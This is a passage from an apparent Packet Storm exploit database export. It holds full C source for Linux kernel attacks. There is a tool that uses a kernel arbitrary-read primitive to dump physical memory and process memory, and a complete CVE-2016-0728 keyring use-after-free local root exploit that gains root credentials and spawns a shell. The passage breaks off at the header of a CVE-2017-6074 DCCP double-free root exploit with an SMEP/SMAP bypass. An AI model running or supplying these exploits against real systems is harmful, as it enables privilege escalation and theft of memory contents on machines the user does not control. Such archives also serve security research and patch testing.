\nexit(EXIT_FAILURE); \n} \nentry->addr = addr; \nmemset(&entry->entries[0], 0, sizeof(entry->entries)); \nreturn entry; \n} \n \nstatic struct pmd_entry *ptsc_alloc_pmd_entry(unsigned long addr) { \nstruct pmd_entry *entry = malloc(sizeof(*entry)); \nif (!entry) { \nperror(\"[-] malloc()\"); \nexit(EXIT_FAILURE); \n} \nentry->addr = addr; \nmemset(&entry->entries[0], 0, sizeof(entry->entries)); \nreturn entry; \n} \n \nstatic struct pud_entry *ptsc_alloc_pud_entry(unsigned long addr) { \nstruct pud_entry *entry = malloc(sizeof(*entry)); \nif (!entry) { \nperror(\"[-] malloc()\"); \nexit(EXIT_FAILURE); \n} \nentry->addr = addr; \nmemset(&entry->entries[0], 0, sizeof(entry->entries)); \nreturn entry; \n} \n \nstatic void ptsc_init(struct ptsc* ptsc, unsigned long physmap, \nunsigned long pgd) { \nptsc->physmap = physmap; \nptsc->entry.addr = pgd; \nmemset(&ptsc->entry.entries[0], 0, sizeof(ptsc->entry.entries)); \n} \n \nstatic unsigned long ptsc_page_virt_to_phys(struct ptsc* ptsc, \nunsigned long addr) { \nstruct pgd_entry *pgd_e; \nstruct pud_entry *pud_e; \nstruct pmd_entry *pmd_e; \nstruct pte_entry *pte_e; \nunsigned long phys_a; \nint index; \n \ndebug1(\"looking up phys addr for %016lx:\\n\", addr); \n \npgd_e = &ptsc->entry; \n \nindex = pgd_index(addr); \ndebug1(\" pgd: %016lx, index: %d\\n\", pgd_e->addr, index); \nif (!pgd_e->entries[index]) { \nunsigned long pgd_v = read_8( \npgd_e->addr + index * sizeof(unsigned long)); \ndebug1(\" -> %016lx\\n\", pgd_v); \nif (pgd_none(pgd_v)) { \ndebug1(\" not found, pgd is none\\n\"); \nreturn 0; \n} \nif (!pgd_present(pgd_v)) { \ndebug1(\" not found, pgd is not present\\n\"); \nreturn 0; \n} \nunsigned long pud_a = \nptsc->physmap + (pgd_v & PHYSICAL_PAGE_MASK); \npud_e = ptsc_alloc_pud_entry(pud_a); \npgd_e->entries[index] = pud_e; \n} \npud_e = pgd_e->entries[index]; \n \nindex = pud_index(addr); \ndebug1(\" pud: %016lx, index: %d\\n\", pud_e->addr, index); \nif (!pud_e->entries[index]) { \nunsigned long pud_v = 
read_8( \npud_e->addr + index * sizeof(unsigned long)); \ndebug1(\" -> %016lx\\n\", pud_v); \nif (pud_none(pud_v)) { \ndebug1(\" not found, pud is none\\n\"); \nreturn 0; \n} \nif (!pud_present(pud_v)) { \ndebug1(\" not found, pud is not present\\n\"); \nreturn 0; \n} \nunsigned long pmd_a = \nptsc->physmap + (pud_v & PHYSICAL_PAGE_MASK); \npmd_e = ptsc_alloc_pmd_entry(pmd_a); \npud_e->entries[index] = pmd_e; \n} \npmd_e = pud_e->entries[index]; \n \nindex = pmd_index(addr); \ndebug1(\" pmd: %016lx, index: %d\\n\", pmd_e->addr, index); \nif (!pmd_e->entries[index].pte) { \nunsigned long pmd_v = read_8( \npmd_e->addr + index * sizeof(unsigned long)); \ndebug1(\" -> %016lx\\n\", pmd_v); \nif (pmd_none(pmd_v)) { \ndebug1(\" not found, pmd is none\\n\"); \nreturn 0; \n} \nif (!pmd_present(pmd_v)) { \ndebug1(\" not found, pmd is not present\\n\"); \nreturn 0; \n} \nif (pmd_flags(pmd_v) & _PAGE_PSE) { \nphys_a = ptsc->physmap + (pmd_v & PHYSICAL_PAGE_MASK) + \n(addr & ~HUGE_PAGE_MASK); \npmd_e->entries[index].phys = phys_a; \npmd_e->entries[index].huge = true; \n} else { \nunsigned long pte_a = \nptsc->physmap + (pmd_v & PHYSICAL_PAGE_MASK); \npte_e = ptsc_alloc_pte_entry(pte_a); \npmd_e->entries[index].pte = pte_e; \npmd_e->entries[index].huge = false; \n} \n} \n \nif (pmd_e->entries[index].huge) { \ndebug1(\" phy: %016lx (huge)\\n\", phys_a); \nreturn pmd_e->entries[index].phys; \n} \n \npte_e = pmd_e->entries[index].pte; \n \nindex = pte_index(addr); \ndebug1(\" pte: %016lx, index: %d\\n\", pte_e->addr, index); \nif (!pte_e->entries[index]) { \nunsigned long pte_v = read_8( \npte_e->addr + index * sizeof(unsigned long)); \ndebug1(\" -> %016lx\\n\", pte_v); \nif (pte_none(pte_v)) { \ndebug1(\" not found, pte is none\\n\"); \nreturn 0; \n} \nif (!pte_present(pte_v)) { \ndebug1(\" not found, pte is not present\\n\"); \nreturn 0; \n} \nphys_a = ptsc->physmap + (pte_v & PHYSICAL_PAGE_MASK) + \n(addr & ~PAGE_MASK); \npte_e->entries[index] = phys_a; \n} \nphys_a = 
pte_e->entries[index]; \n \nreturn phys_a; \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nstatic unsigned long find_task_by_pid(unsigned long init_task, unsigned pid) { \nunsigned long cur_task = init_task; \n \nwhile (true) { \nunsigned cur_pid = \nread_field_4(cur_task, O_TASK_STRUCT_PID); \nif (cur_pid == pid) \nreturn cur_task; \nunsigned long task_next_ptr = \nread_field_8(cur_task, O_TASK_STRUCT_TASKS); \ncur_task = task_next_ptr - O_TASK_STRUCT_TASKS; \nif (cur_task == init_task) \nreturn 0; \n} \n} \n \n#define MAX_MMAPS_PER_TASK 512 \n \nstruct mmap_entry { \nunsigned long start; \nunsigned long end; \nunsigned flags; \n}; \n \ntypedef void (*mmap_callback)(struct mmap_entry *entry, void *private); \n \nstatic void for_each_mmap_from(unsigned long mmap, mmap_callback callback, \nvoid *private) { \nstruct mmap_entry entries[MAX_MMAPS_PER_TASK]; \nint i, count; \n \ncount = 0; \nwhile (mmap != 0) { \nassert(count < MAX_MMAPS_PER_TASK); \nunsigned long vm_start = \nread_field_8(mmap, O_VM_AREA_STRUCT_VM_START); \nunsigned long vm_end = \nread_field_8(mmap, O_VM_AREA_STRUCT_VM_END); \nif (vm_start >= TASK_SIZE || vm_end >= TASK_SIZE) { \ninfo(\"[-] bad mmap (did the task die?)\\n\"); \nexit(EXIT_FAILURE); \n} \nunsigned vm_flags = \nread_field_4(mmap, O_VM_AREA_STRUCT_VM_FLAGS); \nentries[count].start = vm_start; \nentries[count].end = vm_end; \nentries[count].flags = vm_flags; \ncount++; \nmmap = read_field_8(mmap, O_VM_AREA_STRUCT_VM_NEXT); \n} \n \nfor (i = 0; i < count; i++) \ncallback(&entries[i], private); \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nstatic unsigned long g_kernel_text = 0; \nstatic unsigned long g_physmap = 0; \n \nstatic struct ptsc g_ptsc; \n \nstatic void physmap_init() { \nunsigned long divide_error = read_idt_gate(0); \ninfo(\"[.] divide_error: %016lx\\n\", divide_error); \n \ng_kernel_text = divide_error - O_DIVIDE_ERROR; \ninfo(\"[.] 
kernel text: %016lx\\n\", g_kernel_text); \n \nif (O_PAGE_OFFSET_BASE) { \nunsigned long page_offset_base = \ng_kernel_text + O_PAGE_OFFSET_BASE; \ninfo(\"[.] page_offset_base: %016lx\\n\", page_offset_base); \n \ng_physmap = read_8(page_offset_base); \ninfo(\"[.] physmap: %016lx\\n\", g_physmap); \nif (g_physmap < PAGE_OFFSET_BASE) { \ninfo(\"[-] physmap sanity check failed \" \n\"(wrong offset?)\\n\"); \nexit(EXIT_FAILURE); \n} \n} else { \ng_physmap = PAGE_OFFSET_BASE; \ninfo(\"[.] physmap: %016lx\\n\", g_physmap); \n} \n} \n \nstatic unsigned long g_mmap = 0; \n \nstatic void pts_init(int pid) { \nunsigned long mm; \n \nif (pid != 0) { \nunsigned long init_task = g_kernel_text + O_INIT_TASK; \ninfo(\"[.] init_task: %016lx\\n\", init_task); \n \nunsigned long task = find_task_by_pid(init_task, pid); \ninfo(\"[.] task: %016lx\\n\", task); \nif (task == 0) { \ninfo(\"[-] task %d not found\\n\", pid); \nexit(EXIT_FAILURE); \n} else if (task < PAGE_OFFSET_BASE) { \ninfo(\"[-] task sanity check failed (wrong offset?)\\n\"); \nexit(EXIT_FAILURE); \n} \n \nmm = read_field_8(task, O_TASK_STRUCT_MM); \ninfo(\"[.] task->mm: %016lx\\n\", mm); \nif (mm == 0) { \ninfo(\"[-] mm not found (kernel task?)\\n\"); \nexit(EXIT_FAILURE); \n} else if (mm < PAGE_OFFSET_BASE) { \ninfo(\"[-] mm sanity check failed (wrong offset?)\\n\"); \nexit(EXIT_FAILURE); \n} \n \ng_mmap = read_field_8(mm, O_MM_STRUCT_MMAP); \ninfo(\"[.] task->mm->mmap: %016lx\\n\", g_mmap); \nif (g_mmap < PAGE_OFFSET_BASE) { \ninfo(\"[-] mmap sanity check failed (wrong offset?)\\n\"); \nexit(EXIT_FAILURE); \n} \n} else { \nmm = g_kernel_text + O_INIT_MM; \n} \n \nunsigned long pgd = read_field_8(mm, O_MM_STRUCT_PGD); \ninfo(\"[.] 
task->mm->pgd: %016lx\\n\", pgd); \nif (pgd < PAGE_OFFSET_BASE) { \ninfo(\"[-] pgd sanity check failed (wrong offset?)\\n\"); \nexit(EXIT_FAILURE); \n} \n \nptsc_init(&g_ptsc, g_physmap, pgd); \n} \n \nstatic unsigned long page_virt_to_phys(unsigned long addr) { \nunsigned long paddr = ptsc_page_virt_to_phys(&g_ptsc, addr); \nassert(paddr != 0); \nreturn paddr - g_physmap; \n} \n \nstatic bool page_check_virt(unsigned long addr) { \nunsigned long paddr = ptsc_page_virt_to_phys(&g_ptsc, addr); \nreturn paddr != 0; \n} \n \nstatic bool page_check_phys(unsigned long offset) { \nreturn page_check_virt(g_physmap + offset); \n} \n \nstatic void phys_read_range(unsigned long offset, size_t length, char *buffer) { \nread_range(g_physmap + offset, length, buffer); \n} \n \nstatic void for_each_mmap(mmap_callback callback, void *private) { \nfor_each_mmap_from(g_mmap, callback, private); \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nstatic int create_file(const char *path) { \nint fd = open(path, O_RDWR | O_CREAT, 0644); \nif (fd < 0) { \nperror(\"[-] open()\"); \nexit(EXIT_FAILURE); \n} \nreturn fd; \n} \n \nstatic int open_dir(const char *path) { \nint fd = open(path, O_DIRECTORY | O_PATH); \nif (fd < 0) { \nperror(\"[-] open()\"); \nexit(EXIT_FAILURE); \n} \nreturn fd; \n} \n \nstatic int create_file_in_dir(int dirfd, const char *name) { \nint fd = openat(dirfd, name, O_RDWR | O_CREAT, 0644); \nif (fd < 0) { \nperror(\"[-] openat()\"); \nexit(EXIT_FAILURE); \n} \nreturn fd; \n} \n \nstatic void write_file(int fd, char *buffer, size_t length) { \nint rv = write(fd, buffer, length); \nif (rv != length) { \nperror(\"[-] write()\"); \nexit(EXIT_FAILURE); \n} \n} \n \nstatic void write_bytes(int fd, unsigned long src_addr, \nchar *buffer, size_t length) { \nif (fd < 0) 
\nprint_bytes(LOG_INFO, src_addr, buffer, length); \nelse \nwrite_file(fd, buffer, length); \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nvoid read_virt_memory(unsigned long addr, size_t length, int fd) { \nchar buffer[PAGE_SIZE]; \nchar empty[PAGE_SIZE]; \n \ndebug1(\"read_virt_memory: addr = %016lx, length = %016lx\\n\", \naddr, length); \n \nmemset(&empty[0], 0, sizeof(empty)); \n \nsize_t total_read = 0; \nwhile (total_read < length) { \nunsigned long current = addr + total_read; \nsize_t to_read = PAGE_SIZE; \nif (current % PAGE_SIZE != 0) \nto_read = PAGE_SIZE - current % PAGE_SIZE; \nto_read = min(to_read, length - total_read); \nif (page_check_virt(addr + total_read)) { \nread_range(addr + total_read, to_read, &buffer[0]); \nwrite_bytes(fd, addr + total_read, &buffer[0], to_read); \n} else { \nwrite_bytes(fd, addr + total_read, &empty[0], to_read); \n} \ntotal_read += to_read; \n} \n} \n \nvoid read_phys_memory(unsigned long src_addr, unsigned long offset, \nsize_t length, int fd) { \nchar buffer[PAGE_SIZE]; \nchar empty[PAGE_SIZE]; \n \ndebug1(\"read_phys_memory: offset = %016lx, length = %016lx\\n\", \noffset, length); \n \nmemset(&empty[0], 0, sizeof(empty)); \n \nsize_t total_read = 0; \nwhile (total_read < length) { \nunsigned long current = offset + total_read; \nsize_t to_read = PAGE_SIZE; \nif (current % PAGE_SIZE != 0) \nto_read = PAGE_SIZE - current % PAGE_SIZE; \nto_read = min(to_read, length - total_read); \nif (page_check_phys(offset + total_read)) { \nphys_read_range(offset + total_read, to_read, \n&buffer[0]); \nwrite_bytes(fd, src_addr + offset + total_read, \n&buffer[0], to_read); \n} else { \nwrite_bytes(fd, src_addr + offset + total_read, \n&empty[0], to_read); \n} \ntotal_read += to_read; \n} \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#define VM_READ 0x00000001 \n#define VM_WRITE 0x00000002 \n#define VM_EXEC 0x00000004 \n \nstatic void 
print_mmap(unsigned long start, unsigned long end, unsigned flags) { \ninfo(\"[%016lx, %016lx) %s%s%s\\n\", \nstart, end, \n(flags & VM_READ) ? \"r\" : \"-\", \n(flags & VM_WRITE) ? \"w\" : \"-\", \n(flags & VM_EXEC) ? \"x\" : \"-\"); \n} \n \nstatic void name_mmap(unsigned long start, unsigned long end, unsigned flags, \nchar *buffer, size_t length) { \nsnprintf(buffer, length, \"%016lx_%016lx_%s%s%s\", \nstart, end, \n(flags & VM_READ) ? \"r\" : \"-\", \n(flags & VM_WRITE) ? \"w\" : \"-\", \n(flags & VM_EXEC) ? \"x\" : \"-\"); \n} \n \nstatic void save_mmap(struct mmap_entry *entry, void *private) { \nint dirfd = (int)(unsigned long)private; \nunsigned long length; \nchar name[128]; \nchar empty[PAGE_SIZE]; \n \nassert(entry->start % PAGE_SIZE == 0); \nassert(entry->end % PAGE_SIZE == 0); \n \nmemset(&empty, 0, sizeof(empty)); \nlength = entry->end - entry->start; \n \nprint_mmap(entry->start, entry->end, entry->flags); \nname_mmap(entry->start, entry->end, entry->flags, \n&name[0], sizeof(name)); \nint fd = create_file_in_dir(dirfd, &name[0]); \n \nsize_t total_read = 0; \nwhile (total_read < length) { \nif (page_check_virt(entry->start + total_read)) { \nunsigned long offset = page_virt_to_phys( \nentry->start + total_read); \nread_phys_memory(entry->start + total_read, offset, \nPAGE_SIZE, fd); \n} else { \nwrite_bytes(fd, entry->start + total_read, \n&empty[0], PAGE_SIZE); \n} \ntotal_read += PAGE_SIZE; \n} \n \nclose(fd); \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nunsigned long get_phys_size() { \nstruct sysinfo info; \nint rv = sysinfo(&info); \nif (rv != 0) { \nperror(\"sysinfo()\"); \nreturn EXIT_FAILURE; \n} \ndebug1(\"phys size: %016lx\\n\", info.totalram); \nreturn info.totalram; \n} \n \nvoid phys_search(unsigned long start, unsigned long end, char *needle) { \nchar buffer[PAGE_SIZE]; \nint length = strlen(needle); \n \nassert(length <= PAGE_SIZE); \n \nunsigned long offset; \nfor (offset = start; 
offset < end; offset += PAGE_SIZE) { \nif (offset % (32ul << 20) == 0) \ninfo(\"[.] now at %016lx\\n\", offset); \nif (!page_check_phys(offset)) \ncontinue; \nphys_read_range(offset, length, &buffer[0]); \nif (memcmp(&buffer[0], needle, length) != 0) \ncontinue; \ninfo(\"[+] found at %016lx\\n\", offset); \nreturn; \n} \ninfo(\"[-] not found\\n\"); \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#define CMD_IDT 1 \n#define CMD_PID 2 \n#define CMD_VIRT 3 \n#define CMD_PHYS 4 \n#define CMD_SEARCH 5 \n \nint g_cmd = 0; \n \nstatic unsigned g_num = 1; \nstatic unsigned g_pid = 0; \nstatic unsigned long g_addr = 0; \nstatic unsigned long g_length = 0; \nstatic unsigned long g_offset = 0; \nstatic const char *g_dir = NULL; \nstatic const char *g_file = NULL; \nstatic char *g_string = NULL; \n \nstatic void print_usage(const char* name) { \ninfo(\"Usage: \\n\"); \ninfo(\" %s idt [NUM] \" \n\"dump IDT entries\\n\", name); \ninfo(\" %s pid PID DIR \" \n\"dump process memory\\n\", name); \ninfo(\" %s virt ADDR LENGTH [FILE] \" \n\"dump virtual memory\\n\", name); \ninfo(\" %s phys OFFSET LENGTH [FILE] \" \n\"dump physical memory\\n\", name); \ninfo(\" %s search STRING [OFFSET [LENGTH]] \" \n\"search start of each physical page\\n\", name); \ninfo(\"\\n\"); \ninfo(\" NUM, PID - decimals\\n\"); \ninfo(\" ADDR, LENGTH, OFFSET - hex\\n\"); \ninfo(\" DIR, FILE, STRING - strings\\n\"); \n} \n \nstatic bool parse_u(char *s, int base, unsigned *out) { \nint length = strlen(s); \nchar *endptr = NULL; \nunsigned long result = strtoul(s, &endptr, base); \nif (endptr != s + length) \nreturn false; \n*out = result; \nreturn true; \n} \n \nstatic bool parse_ul(char *s, int base, unsigned long *out) { \nint length = strlen(s); \nchar *endptr = NULL; \nunsigned long result = strtoul(s, &endptr, base); \nif (endptr != s + length) \nreturn false; \n*out = result; \nreturn true; \n} \n \nstatic int parse_cmd(const char *cmd) { \nif (strcmp(cmd, 
\"idt\") == 0) \nreturn CMD_IDT; \nif (strcmp(cmd, \"pid\") == 0) \nreturn CMD_PID; \nif (strcmp(cmd, \"virt\") == 0) \nreturn CMD_VIRT; \nif (strcmp(cmd, \"phys\") == 0) \nreturn CMD_PHYS; \nif (strcmp(cmd, \"search\") == 0) \nreturn CMD_SEARCH; \nreturn 0; \n} \n \nstatic bool parse_args(int argc, char **argv) { \nif (argc < 2) \nreturn false; \n \ng_cmd = parse_cmd(argv[1]); \n \nswitch (g_cmd) { \ncase CMD_IDT: \nif (argc > 3) \nreturn false; \nif (argc >= 3 && !parse_u(argv[2], 10, &g_num)) \nreturn false; \nreturn true; \ncase CMD_PID: \nif (argc != 4) \nreturn false; \nif (!parse_u(argv[2], 10, &g_pid)) \nreturn false; \nif (g_pid <= 0) \nreturn false; \ng_dir = argv[3]; \ndebug1(\"CMD_PID %u %s\\n\", g_pid, g_dir); \nreturn true; \ncase CMD_VIRT: \nif (argc < 4 || argc > 5) \nreturn false; \nif (!parse_ul(argv[2], 16, &g_addr)) \nreturn false; \nif (!parse_ul(argv[3], 16, &g_length)) \nreturn false; \nif (argc == 5) \ng_file = argv[4]; \ndebug1(\"CMD_VIRT %016lx %016lx %s\\n\", g_addr, \ng_length, g_file ? g_file : \"NULL\"); \nreturn true; \ncase CMD_PHYS: \nif (argc < 4 || argc > 5) \nreturn false; \nif (!parse_ul(argv[2], 16, &g_offset)) \nreturn false; \nif (!parse_ul(argv[3], 16, &g_length)) \nreturn false; \nif (argc == 5) \ng_file = argv[4]; \ndebug1(\"CMD_PHYS %016lx %016lx %s\\n\", g_offset, \ng_length, g_file ? g_file : \"NULL\"); \nreturn true; \ncase CMD_SEARCH: \nif (argc < 3 || argc > 5) \nreturn false; \ng_string = argv[2]; \nif (argc >= 4 && !parse_ul(argv[3], 16, &g_offset)) \nreturn false; \nif (argc >= 5 && !parse_ul(argv[4], 16, &g_length)) \nreturn false; \ndebug1(\"CMD_SEARCH <%s> %016lx %016lx\\n\", \ng_string, g_offset, g_length); \nreturn true; \ndefault: \nreturn false; \n} \n \nreturn true; \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nvoid handle_cmd_idt() { \ninfo(\"[.] 
dumping IDT\\n\"); \nprint_idt(g_num); \ninfo(\"[+] done\\n\"); \n} \n \nvoid handle_cmd_virt() { \nint fd = -1; \ninfo(\"[.] dumping virtual memory [%016lx, %016lx):\\n\", \ng_addr, g_addr + g_length); \nif (g_file != NULL) \nfd = create_file(g_file); \nread_virt_memory(g_addr, g_length, fd); \nif (fd != -1) \nclose(fd); \ninfo(\"[+] done\\n\"); \n} \n \nvoid handle_cmd_phys() { \nint fd = -1; \ninfo(\"[.] dumping physical memory [%016lx, %016lx):\\n\", \ng_offset, g_offset + g_length); \nif (g_file != NULL) \nfd = create_file(g_file); \nread_phys_memory(0, g_offset, g_length, fd); \nif (fd != -1) \nclose(fd); \ninfo(\"[+] done\\n\"); \n} \n \nvoid handle_cmd_pid() { \ninfo(\"[.] dumping mmaps for %u:\\n\", g_pid); \nint dirfd = open_dir(g_dir); \nfor_each_mmap(save_mmap, (void *)(unsigned long)dirfd); \nclose(dirfd); \ninfo(\"[+] done\\n\"); \n} \n \nvoid handle_cmd_search() { \nunsigned long start = g_offset ? g_offset : 0; \nunsigned long end = g_length ? (start + g_length) : get_phys_size(); \ninfo(\"[.] 
searching [%016lx, %016lx) for '%s':\\n\", \nstart, end, g_string); \nphys_search(start, end, g_string); \ninfo(\"[+] done\\n\"); \n} \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \nint main(int argc, char **argv) { \nassert(getpagesize() == PAGE_SIZE); \n \nif (!parse_args(argc, argv)) { \nprint_usage(argv[0]); \nexit(EXIT_FAILURE); \n} \n \narbitrary_read_init(); \n \nif (g_cmd == CMD_IDT) { \nhandle_cmd_idt(); \nreturn EXIT_SUCCESS; \n} \n \nphysmap_init(); \n \nswitch (g_cmd) { \ncase CMD_VIRT: \npts_init(getpid()); \nhandle_cmd_virt(); \nbreak; \ncase CMD_PHYS: \npts_init(0); \nhandle_cmd_phys(); \nbreak; \ncase CMD_SEARCH: \npts_init(0); \nhandle_cmd_search(); \nbreak; \ncase CMD_PID: \npts_init(g_pid); \nhandle_cmd_pid(); \nbreak; \n} \n \nreturn EXIT_SUCCESS; \n} \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148867/linkern4147-fileread.txt"}, {"lastseen": "2016-12-05T22:13:52", "description": "", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "packetstorm", "title": "Linux Kernel REFCOUNT Overflow / Use-After-Free", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2016-01-20T00:00:00", "id": "PACKETSTORM:135330", "href": "https://packetstormsecurity.com/files/135330/Linux-Kernel-REFCOUNT-Overflow-Use-After-Free.html", "sourceData": "`# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings \n# Date: 19/1/2016 \n# Exploit Author: Perception Point Team \n# CVE : CVE-2016-0728 \n \n/* CVE-2016-0728 local root exploit \nmodified by Federico Bento to read kernel symbols from /proc/kallsyms \nprops to grsecurity/PaX for preventing this in so many ways \n \n$ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall \n$ ./cve_2016_072 PP_KEY */ \n \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <sys/types.h> \n#include <keyutils.h> \n#include <unistd.h> \n#include 
<time.h> \n#include <unistd.h> \n \n#include <sys/ipc.h> \n#include <sys/msg.h> \n \ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); \ntypedef unsigned long __attribute__((regparm(3))) (* \n_prepare_kernel_cred)(unsigned long cred); \n_commit_creds commit_creds; \n_prepare_kernel_cred prepare_kernel_cred; \n \n#define STRUCT_LEN (0xb8 - 0x30) \n#define COMMIT_CREDS_ADDR (0xffffffff810bb050) \n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370) \n \n \n \nstruct key_type { \nchar * name; \nsize_t datalen; \nvoid * vet_description; \nvoid * preparse; \nvoid * free_preparse; \nvoid * instantiate; \nvoid * update; \nvoid * match_preparse; \nvoid * match_free; \nvoid * revoke; \nvoid * destroy; \n}; \n \n/* thanks spender - Federico Bento */ \nstatic unsigned long get_kernel_sym(char *name) \n{ \nFILE *f; \nunsigned long addr; \nchar dummy; \nchar sname[256]; \nint ret; \n \nf = fopen(\"/proc/kallsyms\", \"r\"); \nif (f == NULL) { \nfprintf(stdout, \"Unable to obtain symbol listing!\\n\"); \nexit(0); \n} \n \nret = 0; \nwhile(ret != EOF) { \nret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname); \nif (ret == 0) { \nfscanf(f, \"%s\\n\", sname); \ncontinue; \n} \nif (!strcmp(name, sname)) { \nfprintf(stdout, \"[+] Resolved %s to %p\\n\", name, (void *)addr); \nfclose(f); \nreturn addr; \n} \n} \n \nfclose(f); \nreturn 0; \n} \n \nvoid userspace_revoke(void * key) { \ncommit_creds(prepare_kernel_cred(0)); \n} \n \nint main(int argc, const char *argv[]) { \nconst char *keyring_name; \nsize_t i = 0; \nunsigned long int l = 0x100000000/2; \nkey_serial_t serial = -1; \npid_t pid = -1; \nstruct key_type * my_key_type = NULL; \n \nstruct { \nlong mtype; \nchar mtext[STRUCT_LEN]; \n} msg = {0x4141414141414141, {0}}; \nint msqid; \n \nif (argc != 2) { \nputs(\"usage: ./keys <key_name>\"); \nreturn 1; \n} \n \nprintf(\"[+] uid=%d, euid=%d\\n\", getuid(), geteuid()); \ncommit_creds = (_commit_creds)get_kernel_sym(\"commit_creds\"); 
\nprepare_kernel_cred = \n(_prepare_kernel_cred)get_kernel_sym(\"prepare_kernel_cred\"); \nif(commit_creds == NULL || prepare_kernel_cred == NULL) { \ncommit_creds = (_commit_creds)COMMIT_CREDS_ADDR; \nprepare_kernel_cred = \n(_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR; \nif(commit_creds == (_commit_creds)0xffffffff810bb050 \n|| prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370) \nputs(\"[-] You probably need to change the address of \ncommit_creds and prepare_kernel_cred in source\"); \n} \n \nmy_key_type = malloc(sizeof(*my_key_type)); \n \nmy_key_type->revoke = (void*)userspace_revoke; \nmemset(msg.mtext, 'A', sizeof(msg.mtext)); \n \n// key->uid \n*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */ \n//key->perm \n*(int*)(&msg.mtext[64]) = 0x3f3f3f3f; \n \n//key->type \n*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type; \n \nif ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { \nperror(\"msgget\"); \nexit(1); \n} \n \nkeyring_name = argv[1]; \n \n/* Set the new session keyring before we start */ \n \nserial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name); \nif (serial < 0) { \nperror(\"keyctl\"); \nreturn -1; \n} \n \nif (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | \nKEY_GRP_ALL | KEY_OTH_ALL) < 0) { \nperror(\"keyctl\"); \nreturn -1; \n} \n \n \nputs(\"[+] Increfing...\"); \nfor (i = 1; i < 0xfffffffd; i++) { \nif (i == (0xffffffff - l)) { \nl = l/2; \nsleep(5); \n} \nif (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { \nperror(\"[-] keyctl\"); \nreturn -1; \n} \n} \nsleep(5); \n/* here we are going to leak the last references to overflow */ \nfor (i=0; i<5; ++i) { \nif (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { \nperror(\"[-] keyctl\"); \nreturn -1; \n} \n} \n \nputs(\"[+] Finished increfing\"); \nputs(\"[+] Forking...\"); \n/* allocate msg struct in the kernel rewriting the freed keyring \nobject */ \nfor (i=0; i<64; i++) { \npid = fork(); \nif (pid == -1) { \nperror(\"[-] 
fork\"); \nreturn -1; \n} \n \nif (pid == 0) { \nsleep(2); \nif ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { \nperror(\"[-] msgget\"); \nexit(1); \n} \nfor (i = 0; i < 64; i++) { \nif (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) { \nperror(\"[-] msgsnd\"); \nexit(1); \n} \n} \nsleep(-1); \nexit(1); \n} \n} \n \nputs(\"[+] Finished forking\"); \nsleep(5); \n \n/* call userspace_revoke from kernel */ \nputs(\"[+] Caling revoke...\"); \nif (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) { \nperror(\"[+] keyctl_revoke\"); \n} \n \nprintf(\"uid=%d, euid=%d\\n\", getuid(), geteuid()); \nexecl(\"/bin/sh\", \"/bin/sh\", NULL); \n \nreturn 0; \n} \n \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/135330/linuxrefcount-uaf.txt"}, {"lastseen": "2017-02-27T16:52:17", "description": "", "cvss3": {}, "published": "2017-02-27T00:00:00", "type": "packetstorm", "title": "Linux Kernel 4.4.0 Ubuntu DCCP Double-Free Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-6074"], "modified": "2017-02-27T00:00:00", "id": "PACKETSTORM:141331", "href": "https://packetstormsecurity.com/files/141331/Linux-Kernel-4.4.0-Ubuntu-DCCP-Double-Free-Privilege-Escalation.html", "sourceData": "`// A proof-of-concept local root exploit for CVE-2017-6074. \n// Includes a semireliable SMAP/SMEP bypass. \n// Tested on 4.4.0-62-generic #83-Ubuntu kernel. \n// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074 \n// \n// Usage: \n// $ gcc poc.c -o pwn \n// $ ./pwn \n// [.] namespace sandbox setup successfully \n// [.] disabling SMEP & SMAP \n// [.] scheduling 0xffffffff81064550(0x406e0) \n// [.] waiting for the timer to execute \n// [.] done \n// [.] SMEP & SMAP should be off now \n// [.] getting root \n// [.] executing 0x402043 \n// [.] done \n// [.] should be root now \n// [.] 
